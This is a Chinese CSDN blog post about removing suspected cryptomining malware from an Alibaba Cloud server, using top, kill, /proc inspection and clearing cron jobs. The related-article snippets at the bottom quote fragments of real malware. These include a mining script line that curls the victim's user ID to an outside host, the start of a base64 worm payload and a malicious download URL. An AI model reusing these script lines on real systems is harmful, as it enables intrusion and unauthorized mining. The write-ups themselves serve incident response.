阿里云被恶意脚本执行,疑似挖矿

已于 2023-01-13 20:57:52 修改
阅读量756 收藏 3
点赞数 1
文章标签: java 运维 linux centos Powered by 金山文档
于 2023-01-10 17:36:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46531837/article/details/128633436
版权

起因:每天一个时间点,阿里云都会发短信说有恶意脚本执行,然后查看服务器,发现CPU被打满,导致异常卡顿。

解决方法:

  1. 有钱的大哥直接买云盾😁

  1. 普通方法

使用top命令查看各进程的内存和CPU使用情况,找出其中消耗比较大的

top命令:
前5行是系统的整体信息
第8行开始的进程信息
PID      进程id
USER    进程所有者的用户名
PR           优先级
NI        nice值,负值表示高优先级,正值表示低优先级
VIRT    进程使用的虚拟内存总量,单位kb。VIRT=SWAP+RES
RES        进程使用的、未被换出的物理内存大小,单位kb。RES=CODE+DATA
SHR        共享内存大小,单位kb
S        进程状态。D=不可中断的睡眠状态 R=运行 S=睡眠 T=跟踪/停止 Z=僵尸进程
%CPU    上次更新到现在的CPU时间占用百分比
%MEM    进程使用的物理内存百分比
TIME+    进程使用的CPU时间总计,单位1/100秒
COMMAND    命令名/命令行

找出CPU占比高的然后,使用

kill -9 pid 杀死对应进程

如果然后,立马重启的话,使用

 ll /proc/pid 查看进程的运行路径,表示信息如下:
cwd符号链接的是进程运行目录;
exe符号连接就是执行程序的绝对路径;
cmdline就是程序运行时输入的命令行命令;
environ记录了进程运行时的环境变量;
fd目录下是进程打开或使用的文件的符号连接。

最后,使用

rm -f 强制删除exe对应下的文件

效果:

有可能会设置有定时任务

crontab -l 查看定时任务

输入:

crontab -e 修改定时任务

如果本身没有定时任务,直接输入删掉

echo > /var/spool/cron/root

查看有没有留下的私钥,并进行删除

汤姆上校d
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
因为操作失误—导致阿里云服务器被执行恶意脚本问题
qq_40572023的博客
12-12 1185
因为操作失误—导致阿里云服务器被执行恶意脚本问题
阿里云ddns自动脚本
10-31
阿里云的ddns脚本linux和mac可用
记一次阿里云执行恶意脚本
weixin_45925840的博客
05-29 900
由于排查时忘记截图了。。。所以就纯文字 1 遇事第一步先重启,发现马上就100%那肯定是定时任务或开机自动执行脚本 2 看定时任务 3 crontab -l 删除 crontab -e 删除 4 没权限 chattr 5 使用charttr也不行,chattr命令被删了 6 find / -name chattr 7 把chattr移回 mv charttr /usr/bin 8 解锁 chattr -ai /var/spool/cron/root 9 sudo......
阿里云服务器被恶意脚本攻击的解决过程
hide-on-bush的博客
05-08 6014
1.阿里云服务器被恶意脚本攻击(挖矿脚本),导致cpu被打满,服务器卡顿,根本无法使用 2.使用top查看各进程的内存和cpu使用情况,找到对应耗内存和cpu的进程id 3.原本想使用kill -9 pid 杀掉对应进程,结果杀掉之后,立马自动重新开启了一个进程; 4.使用 ll /proc/pid 查看进程的运行路径,各路径表示信息如下: cwd符号链接的是进程运行目录; exe符号连接就是执行程序的绝对路径; cmdline就是程序运行时输入的命令命令; environ记录了进程运行时的环境变量; f
服务应用执行可疑命令
晓川吖的专栏
09-10 678
1、最近时常收到阿里云安全中心的告警信息-服务应用执行可疑命令,如下图所示 现在有时间后,可以好好研究下这个问题了。 命令行: docker-untar /home/xxx/docker/devicemapper/mnt/735440904d99308126bfc001df5750783fdd2f7f72a209c33e8d16fb9f53de72/rootfs/home/tutor/.ssh/authorized_keys null 摘自互联网: docker-untar ,通过re...
阿里云服务器被入侵执行MoneroOcean(门罗币)挖矿脚本
热门推荐
weixin_54071027的博客
06-26 1万+
为学习使用Redis,在阿里云Linux服务器上安装了redis并且后台运行,开放了默认端口,而且没有设置访问密码,当天晚上被执行恶意脚本恶意代码如下,分享一下: #!/bin/bash us=$(id) curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null ulimit -n 65535 export MOHOME=/usr/share mkdir $MOHOME -p if [ -f "$MOHOME/[
SendSms_调取阿里云短信接口脚本_
10-03
阿里云短信接口脚本执行批处理文件实现发送短信
AliDDNS-阿里云自动解析脚本(含ipv6公网IP自动解析).zip
10-08
我加入了IPv6自动解析脚本。到手直接用。非常适合家里有群晖NAS但是只有公网IPv6的家庭宽带。绝对是优秀的DDNS方案。 本脚本的工作流程是:对比... 3、最后,执行aliddns.sh脚本,如: ./aliddns.sh [OPTION] <String>
阿里云python采集脚本
最新发布
09-19
阿里云python采集脚本
阿里云动态域名解析ddns脚本(python)
12-07
因ip会不定时被更新,建议使用定时运行此脚本达到及时更新的效果
阿里云安全恶意程序检测-数据集
03-20
security_submit.csv security_train.zip security_test.zip
阿里云ECS恶意代码执行
Wqiccc的博客
08-23 2203
小白在服务器上跑redis刚开始没有设置密码,服务器被入侵了,试了很久都没用。求大佬帮忙。。。。
【错误汇总】阿里云创建邮件告警 python 脚本执行超时
changshou6634的博客
07-04 553
现象:做了一个邮件告警脚本,python 写的,名称 mail.py,内容如下 #!/usr/bin/python #coding:utf-8 import smtplib from email.mime.text import MIMEText import sys mail_user = 'admin@axxxxxxxxxxx.cn' mail_pass = '8xxxxxxxxxxxxj...
Solr服务,阿里云报警说是发现了漏洞,文件中包含WebShell代码
一个程序员的专栏
06-16 434
我查看了log里面的内容(中文显示乱码),记录了我们这个分片上的索引添加的一些内容,很奇怪的是里面竟然有异常信息,感觉像是我们的爬虫程序执行了一个API的接口调用,接口调用失败然后报了异常,我猜测这也导致了这个log文件的状态出现了异常,所以solr一直没有更新这个log。请注意,Tlog文件是可选的,并且可以在Solr配置中禁用。我们的场景是数据采集后存储在Solr里面,所以tlog里面记录了对索引的操作,采集的内容里面有WebShell代码,特别是一些技术类博客的内容,里面有代码块。
阿里云服务器被攻击(请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件)
10年IT大头兵
05-04 1584
收到阿里云提醒被攻击了: URL链接:http://185.181.10.234/e5db0e07c3d7be80v520/init.sh netstat -anp |grepSYN_SENT ###如果这个命令查出来很多,那就是被攻击了 首先:改服务器登录密码,或者检查密钥文件是否被改过。这两个点都先检查并修改。这时重启服务器。我的因为刚被攻击,那边还连着,我不重启,他还是能操作。...
阿里云服务器被恶意程序攻击
qq_31755183的博客
10-29 3102
进日收到阿里云发来的报警信息,有台大数据服务器被恶意程序攻击,导致服务器的CUP、内存增高,之前处理过这种问题,处理的办法不是很理想,隔了一段时间又出现此类问题。在此总结一下: 导致此类事件的原因包括: 服务器的端口对外开放,黑客利用这些端口的漏洞来入侵服务器; 服务器的账号密码过于简单,被黑客暴力破解入侵服务器; 解决问题的办法如下: 连接服务器找到恶意程序进程杀掉; 删掉恶意进程文件; 将对应执行恶意程序的用户也清除掉; 清除系统计划任务中.
阿里云中了挖矿病毒;nexus-3.9.0-01:/service/extdirect漏洞;ldr.sh;sysrv、network01
小狮子的博客
01-23 2958
先描述下我的问题。 阿里云一直短信加邮件提示“...服务器因被攻击限制访问部分IP及端口...” 看图: 方便复制搜索 Web应用威胁检测-疑似成功的Web攻击已手工处理高级威胁检测模型 备注 该告警由如下引擎检测发现: 请求时间: 2021-01-19 06:05:22 攻击者IP: 34.66.235.248 Host: ---------:8081 URI: /service/extdirect Content_type: application/json;charset=utf-.
[问题已处理]-阿里云服务器种了蠕虫病毒和恶意下载病毒处理
爷来辣的博客
06-18 1945
今天给公司阿里云服务器安装了安骑士 下午就发现有告警,几乎所有的服务器都种了病毒,并且种类还不一样。 1 蠕虫病毒 echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10cnVtcGtwYWF5M3RoMnBzCmRpcj0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9
阿里云ECS运维恶意程序告警及处理过程
jerryzhou的博客
09-17 4583
接上篇:ECS CPU突然告警,处理无效后重启了ECS实例。在这之后运行几天后,ECS告警有异常,登录后定位到3个文件 共有2个蠕虫病毒,1个恶意程序 恶意程序C:/Windows/SysWOW64/config/systemprofile/AppData/Roaming/NetworkLocationAwarenes/NetworkLocationAwarenes.exe 蠕虫病毒 C:/Wi...
阿里云writeIotTopic脚本解析
05-17
阿里云的writeIotTopic脚本是针对IoT设备开发的,主要用于向设备发送消息。具体解析如下: 1. 首先,该脚本需要引入阿里云的Python SDK,以便于与IoT平台进行交互。 2. 接着,需要定义IoT平台的访问信息,包括设备的ProductKey、DeviceName、DeviceSecret、Region、Endpoint等。这些信息可以在阿里云IoT平台控制台中获取。 3. 然后,需要定义要发送的消息内容和消息主题。其中,消息主题由ProductKey、DeviceName和Topic三部分组成,可以根据实际需求自定义。 4. 接着,通过阿里云SDK中的IoTClient对象进行连接,并调用publish方法将消息发送到设备。 5. 最后,关闭连接。 综上所述,writeIotTopic脚本主要是通过阿里云Python SDK实现了向IoT设备发送消息的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值